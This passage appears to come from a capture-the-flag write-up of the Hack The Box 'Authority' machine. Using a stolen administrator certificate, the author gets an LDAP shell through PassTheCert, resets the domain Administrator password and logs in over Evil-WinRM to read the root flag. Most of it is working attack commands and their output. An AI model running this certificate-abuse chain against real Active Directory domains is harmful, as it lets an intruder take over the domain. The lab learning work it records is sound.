└─$ certipy-ad auth -pfx administrator.pfx -dc-ip 10.129.145.117                                                                         
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Using principal: [email protected]
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERR_PADATA_TYPE_NOSUPP(KDC has no support for padata type)

We get similar results when trying Rubeus, as most of the guides I've found suggest.  It's back to Google I go to find a way to use this certificate.  That's when I find PassTheCert from AlmondOffSec.  With this, I should be able to connect to LDAP using the certificate.  Let's give it a try.

First, I need to break out the pfx to a crt and key.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ certipy-ad cert -pfx administrator.pfx -nokey -out admin.crt
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Writing certificate and  to 'admin.crt'
                                                                                                                                                            
┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ certipy-ad cert -pfx administrator.pfx -nocert -out admin.key
Certipy v4.7.0 - by Oliver Lyak (ly4k)

[*] Writing private key to 'admin.key'

Now, I can try to connect to LDAP.  I opt to just get an ldap-shell.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ python3 passthecert.py -action ldap-shell -crt admin.crt -key admin.key -domain authority.htb -dc-ip 10.129.145.117
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

Type help for list of commands

# 

We have an ldap-shell!  Looking at the built-in help for the ldap shell, the easiest way forward here is to just change the password of the Administrator account.

# change_password Administrator N1njaPass!
Got User DN: CN=Administrator,CN=Users,DC=authority,DC=htb
Attempting to set new password of: N1njaPass!
Password changed successfully!

Now with the password set, all that's left is to connect via WinRM and grab the flag.

┌──(kali㉿kalivm)-[~/htb/Authority]
└─$ evil-winrm -i 10.129.145.117 -u 'administrator' -p 'N1njaPass!'                                                                 
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cat ../Desktop/root.txt
8c0e...snip


